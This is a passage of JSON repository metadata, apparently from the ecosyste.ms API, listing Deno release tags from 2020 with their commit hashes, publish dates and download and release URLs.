4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-